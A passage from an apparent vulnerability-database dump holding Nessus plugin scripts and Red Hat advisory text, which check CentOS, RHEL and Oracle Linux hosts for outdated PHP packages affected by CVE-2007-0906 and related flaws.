script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-devel-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-imap-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-ldap-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-mysql-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-odbc-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-pgsql-4.3.2-39.ent\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"php-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-devel-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-domxml-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-gd-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-imap-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ldap-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mbstring-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mysql-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ncurses-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-odbc-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pear-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pgsql-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-snmp-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-xmlrpc-4.3.9-3.22.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:46", "bulletinFamily": "scanner", "description": "Updated PHP packages that fix several security issues are now available for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session extension; the str_replace() function; and the imap_mail_compose() function. If very long strings were passed to the str_replace() function, an integer overflow could occur in memory allocation. If a script used the imap_mail_compose() function to create a new MIME message based on an input body from an untrusted source, it could result in a heap overflow. An attacker with access to a PHP application affected by any these issues could trigger the flaws and possibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the zend_hash_init() function could be forced into an infinite loop, consuming CPU resources for a limited time, until the script timeout alarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted source, certain WDDX input packets could expose a random portion of heap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a database, and the database table contents were under an attacker's control, a format string vulnerability was possible which could allow arbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header() function in a script. However it is unlikely that this would have any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain super-global variables via unspecified vectors. (CVE-2007-0910)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues.\n\nRed Hat would like to thank Stefan Esser for his help diagnosing these issues.", "modified": "2018-11-16T00:00:00", "id": "REDHAT-RHSA-2007-0081.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24697", "published": "2007-02-23T00:00:00", "title": "RHEL 2.1 : php (RHSA-2007:0081)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0081. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24697);\n script_version (\"1.21\");\n script_cvs_date(\"Date: 2018/11/16 15:19:26\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1380\", \"CVE-2007-1701\", \"CVE-2007-1825\");\n script_bugtraq_id(22496);\n script_xref(name:\"RHSA\", value:\"2007:0081\");\n\n script_name(english:\"RHEL 2.1 : php (RHSA-2007:0081)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension; the str_replace() function; and the imap_mail_compose()\nfunction. If very long strings were passed to the str_replace()\nfunction, an integer overflow could occur in memory allocation. If a\nscript used the imap_mail_compose() function to create a new MIME\nmessage based on an input body from an untrusted source, it could\nresult in a heap overflow. An attacker with access to a PHP\napplication affected by any these issues could trigger the flaws and\npossibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function could be forced into an infinite loop,\nconsuming CPU resources for a limited time, until the script timeout\nalarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted\nsource, certain WDDX input packets could expose a random portion of\nheap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a\ndatabase, and the database table contents were under an attacker's\ncontrol, a format string vulnerability was possible which could allow\narbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header()\nfunction in a script. However it is unlikely that this would have any\neffect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\n\nRed Hat would like to thank Stefan Esser for his help diagnosing these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1825\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0081\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0081\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-4.1.2-2.14\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-devel-4.1.2-2.14\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-imap-4.1.2-2.14\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-ldap-4.1.2-2.14\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-manual-4.1.2-2.14\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-mysql-4.1.2-2.14\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-odbc-4.1.2-2.14\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-pgsql-4.1.2-2.14\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-imap / php-ldap / php-manual / php-mysql / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:19:12", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2007:0076 :\n\nUpdated PHP packages that fix several security issues are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session extension, the str_replace() function, and the imap_mail_compose() function. If very long strings under the control of an attacker are passed to the str_replace() function then an integer overflow could occur in memory allocation. If a script uses the imap_mail_compose() function to create a new MIME message based on an input body from an untrusted source, it could result in a heap overflow. An attacker who is able to access a PHP application affected by any these issues could trigger these flaws and possibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nIf unserializing untrusted data on 64-bit platforms, the zend_hash_init() function can be forced to enter an infinite loop, consuming CPU resources for a limited length of time, until the script timeout alarm aborts execution of the script. (CVE-2007-0988)\n\nIf the wddx extension is used to import WDDX data from an untrusted source, certain WDDX input packets may allow a random portion of heap memory to be exposed. (CVE-2007-0908)\n\nIf the odbc_result_all() function is used to display data from a database, and the contents of the database table are under the control of an attacker, a format string vulnerability is possible which could lead to the execution of arbitrary code. (CVE-2007-0909)\n\nA one byte memory read will always occur before the beginning of a buffer, which could be triggered for example by any use of the header() function in a script. However it is unlikely that this would have any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allows attackers to 'clobber' certain super-global variables via unspecified vectors. (CVE-2007-0910)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues.\n\nRed Hat would like to thank Stefan Esser for his help diagnosing these issues.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2007-0076.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67451", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 / 4 : php (ELSA-2007-0076)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2007:0076 and \n# Oracle Linux Security Advisory ELSA-2007-0076 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67451);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/18 17:43:55\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1380\", \"CVE-2007-1701\", \"CVE-2007-1825\");\n script_bugtraq_id(22496);\n script_xref(name:\"RHSA\", value:\"2007:0076\");\n\n script_name(english:\"Oracle Linux 3 / 4 : php (ELSA-2007-0076)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2007:0076 :\n\nUpdated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension, the str_replace() function, and the imap_mail_compose()\nfunction. If very long strings under the control of an attacker are\npassed to the str_replace() function then an integer overflow could\noccur in memory allocation. If a script uses the imap_mail_compose()\nfunction to create a new MIME message based on an input body from an\nuntrusted source, it could result in a heap overflow. An attacker who\nis able to access a PHP application affected by any these issues could\ntrigger these flaws and possibly execute arbitrary code as the\n'apache' user. (CVE-2007-0906)\n\nIf unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function can be forced to enter an infinite loop,\nconsuming CPU resources for a limited length of time, until the script\ntimeout alarm aborts execution of the script. (CVE-2007-0988)\n\nIf the wddx extension is used to import WDDX data from an untrusted\nsource, certain WDDX input packets may allow a random portion of heap\nmemory to be exposed. (CVE-2007-0908)\n\nIf the odbc_result_all() function is used to display data from a\ndatabase, and the contents of the database table are under the control\nof an attacker, a format string vulnerability is possible which could\nlead to the execution of arbitrary code. (CVE-2007-0909)\n\nA one byte memory read will always occur before the beginning of a\nbuffer, which could be triggered for example by any use of the\nheader() function in a script. However it is unlikely that this would\nhave any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allows attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\n\nRed Hat would like to thank Stefan Esser for his help diagnosing these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-February/000052.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-March/000098.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-devel-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-devel-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-imap-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-imap-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-ldap-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-ldap-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-mysql-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-mysql-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-odbc-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-odbc-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-pgsql-4.3.2-39.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.2-39.ent\")) flag++;\n\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-devel-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-devel-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-domxml-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-domxml-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-gd-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-gd-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-imap-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-imap-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ldap-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ldap-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mbstring-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mbstring-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mysql-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mysql-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ncurses-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ncurses-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-odbc-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-odbc-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pear-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pear-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pgsql-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-snmp-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-snmp-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-xmlrpc-4.3.9-3.22.3\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-xmlrpc-4.3.9-3.22.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / 